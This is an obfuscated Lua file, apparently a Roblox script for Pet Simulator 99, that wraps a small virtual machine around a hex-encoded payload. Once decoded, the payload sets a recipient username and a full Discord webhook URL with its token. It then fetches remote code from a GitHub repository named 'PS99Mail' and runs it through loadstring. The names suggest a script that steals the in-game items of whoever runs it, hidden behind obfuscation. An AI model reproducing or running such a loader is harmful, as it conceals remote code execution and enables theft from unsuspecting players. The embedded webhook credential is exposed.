--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.2) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v82,v19);v19=nil;v97=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-((2569 -(1523 + 114)) -(857 + 74)))) + (569 -(367 + 201)))) ;return v84-(v84%((1805 -(282 + 595)) -(214 + 641 + 72))) ;end end else local v85=2^(v32-1) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23() local v37=(297 -(67 + 113)) -(24 + 8 + 85) ;local v38;local v39;local v40;local v41;while true do if (v37==(1 + 0)) then return (v41 * (3720433 + 13056783)) + (v40 * (66493 -(892 + 65))) + (v39 * 256) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -3) ;v37=351 -(87 + 263) ;end end end local function v24() local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1 + 0 ,79 -59 ) * ((6 -4)^(984 -(802 + 150)))) + v42 ;local v46=v20(v43,56 -35 ,31);local v47=((v20(v43,474 -(416 + 26) )==(1 -0)) and  -(1 + 0)) or (1 -0) ;if (v46==(0 + 0)) then if (v45==(997 -(915 + 82))) then return v47 * (0 -0) ;else local v89=0 + (0 -0) ;while true do if (v89==(0 + 0)) then v46=1 -0 ;v44=0;break;end end end elseif (v46==(3234 -(1069 + 118))) then return ((v45==((1631 -(814 + 45)) -(201 + (1406 -835)))) and (v47 * ((1139 -(116 + 1022))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-((121 + 2116) -1214) ) * (v44 + (v45/((1 + 1)^(92 -40)))) ;end local function v25(v48) local v49=0;local v50;local v51;while true do if (v49==(1 + 1)) then v51={};for v90=886 -(261 + 624) , #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=(1917 -(1789 + 124)) -1 ;end if (v49==((1847 -(745 + 21)) -(1020 + (1807 -(760 + 987))))) then v50=v3(v16,v18,(v18 + v48) -(1424 -(217 + 413 + 793)) );v18=v18 + v48 ;v49=6 -4 ;end if (v49==(14 -11)) then return v6(v51);end if (v49==0) then v50=nil;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=3 -2 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((2 -1)==v52) then v55=nil;v56=nil;v52=2;end if (2~=v52) then else v57=nil;v58=nil;v52=3 -0 ;end if (v52~=0) then else v53=0;v54=nil;v52=1;end if (v52~=3) then else v59=nil;while true do local v92=0;while true do if (v92~=1) then else if ((1 -0)~=v53) then else local v100=0 -0 ;while true do if (v100==(285 -(134 + 151))) then local v132=0;while true do if (v132==0) then v58=v23();v59={};v132=1666 -(970 + 695) ;end if (v132~=1) then else v100=1 -0 ;break;end end end if (v100==1) then local v133=1990 -(582 + 1408) ;while true do if (v133==(3 -2)) then v100=2 -0 ;break;end if (v133~=0) then else for v158=1,v58 do local v159=0;local v160;local v161;local v162;local v163;while true do if (2~=v159) then else while true do if (v160~=(0 -0)) then else local v174=0;while true do if (v174~=(1825 -(1195 + 629))) then else v160=1 -0 ;break;end if (v174~=(241 -(187 + 54))) then else v161=780 -(162 + 618) ;v162=nil;v174=1 + 0 ;end end end if (v160==1) then v163=nil;while true do if (v161==(1 + 0)) then if (v162==(1 -0)) then v163=v21()~=0 ;elseif (v162==(2 -0)) then v163=v24();elseif (v162~=(1 + 2)) then else v163=v25();end v59[v158]=v163;break;end if (v161==0) then local v176=0;local v177;while true do if (v176~=(1636 -(1373 + 263))) then else v177=0;while true do if (v177~=1) then else v161=1;break;end if (v177==(1000 -(451 + 549))) then local v186=0 + 0 ;while true do if (v186~=(1 -0)) then else v177=1 -0 ;break;end if (v186~=0) then else v162=v21();v163=nil;v186=1;end end end end break;end end end end break;end end break;end if (1~=v159) then else v162=nil;v163=nil;v159=2;end if (v159==(1384 -(746 + 638))) then v160=0 + 0 ;v161=nil;v159=1;end end end v57[3]=v21();v133=1;end end end if ((2 -0)==v100) then v53=343 -(218 + 123) ;break;end end end break;end if (0==v92) then local v99=1581 -(1535 + 46) ;while true do if (v99~=1) then else v92=1 + 0 ;break;end if (v99~=(0 + 0)) then else if (v53~=(560 -(306 + 254))) then else v54={};v55={};v56={};v57={v54,v55,nil,v56};v53=1;end if (v53==2) then local v134=0 -0 ;while true do if (v134==(603 -(268 + 335))) then for v164=1,v23() do local v165=290 -(60 + 230) ;local v166;while true do if (v165==(572 -(426 + 146))) then v166=v21();if (v20(v166,1 + 0 ,1)~=0) then else local v169=1456 -(282 + 1174) ;local v170;local v171;local v172;local v173;while true do if (v169~=(813 -(569 + 242))) then else while true do if (v170~=2) then else local v178=0 -0 ;local v179;while true do if (v178==0) then v179=0;while true do if (v179==1) then v170=1 + 2 ;break;end if (v179~=(1024 -(706 + 318))) then else if (v20(v172,1252 -(721 + 530) ,1272 -(945 + 326) )~=(2 -1)) then else v173[2]=v59[v173[2 + 0 ]];end if (v20(v172,2,702 -(271 + 429) )~=1) then else v173[3]=v59[v173[3 + 0 ]];end v179=1501 -(1408 + 92) ;end end break;end end end if (v170~=(1087 -(461 + 625))) then else local v180=1288 -(993 + 295) ;while true do if (1~=v180) then else v170=1 + 1 ;break;end if (v180==(1171 -(418 + 753))) then v173={v22(),v22(),nil,nil};if (v171==(0 + 0)) then local v187=0;local v188;while true do if (v187~=(0 + 0)) then else v188=0;while true do if (v188~=0) then else v173[1 + 2 ]=v22();v173[4]=v22();break;end end break;end end elseif (v171==(530 -(406 + 123))) then v173[3]=v23();elseif (v171==2) then v173[1772 -(1749 + 20) ]=v23() -((1 + 1)^(1338 -(1249 + 73))) ;elseif (v171==3) then local v198=0;local v199;while true do if (v198==0) then v199=0 + 0 ;while true do if (v199==(1145 -(466 + 679))) then v173[3]=v23() -(2^(38 -22)) ;v173[4]=v22();break;end end break;end end end v180=1;end end end if ((0 -0)==v170) then local v181=1900 -(106 + 1794) ;local v182;while true do if ((0 + 0)==v181) then v182=0 + 0 ;while true do if (v182~=(2 -1)) then else v170=1;break;end if (v182~=0) then else local v189=0 -0 ;while true do if (v189~=0) then else v171=v20(v166,116 -(4 + 110) ,587 -(57 + 527) );v172=v20(v166,1431 -(41 + 1386) ,109 -(17 + 86) );v189=1;end if (v189==1) then v182=1;break;end end end end break;end end end if (v170~=(3 + 0)) then else if (v20(v172,3,6 -3 )~=(2 -1)) then else v173[170 -(122 + 44) ]=v59[v173[6 -2 ]];end v54[v164]=v173;break;end end break;end if (0==v169) then v170=0 -0 ;v171=nil;v169=1 + 0 ;end if (v169==(1 + 0)) then v172=nil;v173=nil;v169=2;end end end break;end end end for v167=1 -0 ,v23() do v55[v167-(66 -(30 + 35)) ]=v28();end v134=1 + 0 ;end if (v134~=(1258 -(1043 + 214))) then else return v57;end end end v99=1;end end end end end break;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v86=0,v74 do if (v86>=v68) then v72[v86-v68 ]=v73[v86 + 1 ];else v76[v86]=v73[v86 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=8) then if (v79<=3) then if (v79<=1) then if (v79>0) then local v101=0;local v102;while true do if (v101==0) then v102=v78[2];v76[v102]=v76[v102](v13(v76,v102 + 1 ,v71));break;end end else local v103=v78[2];v76[v103]=v76[v103](v13(v76,v103 + 1 ,v71));end elseif (v79>2) then if ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v62;else v76[v78[2]]=v62[v78[3]];end else v62[v78[3]]=v76[v78[2]];end elseif (v79<=5) then if (v79>4) then v76[v78[2]]=v78[3]~=0 ;else v76[v78[2]]=v78[3]~=0 ;end elseif (v79<=6) then do return;end elseif (v79==7) then if ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v62;else v76[v78[2]]=v62[v78[3]];end else v76[v78[2]]();end elseif (v79<=12) then if (v79<=10) then if (v79>9) then local v109=0;local v110;local v111;while true do if (v109==1) then v76[v110 + 1 ]=v111;v76[v110]=v111[v78[4]];break;end if (v109==0) then v110=v78[2];v111=v76[v78[3]];v109=1;end end else v62[v78[3]]=v76[v78[2]];end elseif (v79==11) then local v114=0;local v115;local v116;while true do if (v114==1) then v76[v115 + 1 ]=v116;v76[v115]=v116[v78[4]];break;end if (v114==0) then v115=v78[2];v116=v76[v78[3]];v114=1;end end else local v117=v78[2];local v118,v119=v69(v76[v117](v13(v76,v117 + 1 ,v78[3])));v71=(v119 + v117) -1 ;local v120=0;for v127=v117,v71 do local v128=0;while true do if (v128==0) then v120=v120 + 1 ;v76[v127]=v118[v120];break;end end end end elseif (v79<=14) then if (v79>13) then local v121=v78[2];local v122,v123=v69(v76[v121](v13(v76,v121 + 1 ,v78[3])));v71=(v123 + v121) -1 ;local v124=0;for v129=v121,v71 do v124=v124 + 1 ;v76[v129]=v122[v124];end else v76[v78[2]]=v78[3];end elseif (v79<=15) then v76[v78[2]]();elseif (v79==16) then v76[v78[2]]=v78[3];else do return;end end v70=v70 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003083O00557365726E616D65030A3O004D61726368626F79313403073O00576562682O6F6B037C3O00682O7470733A2O2F646973636F7264612O702E636F6D2F6170692F776562682O6F6B732F313230393035383933383037393831333635322F75354C577749686D6B37742D6D63765F56595F414469666C6B524E3732375131716F335F3948544E74472D6D763467477358793558766A5643785750644A50764736755A03153O0073656C65637465644C6F6164696E675363722O656E03013O0032030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900103O00120D3O00023O0012023O00013O00120D3O00043O0012023O00033O00120D3O00063O0012023O00054O00053O00013O0012023O00073O0012033O00083O001203000100093O00200A00010001000A00120D0003000B4O000C000100039O0000022O00083O000100012O00113O00017O00",v9(),...);
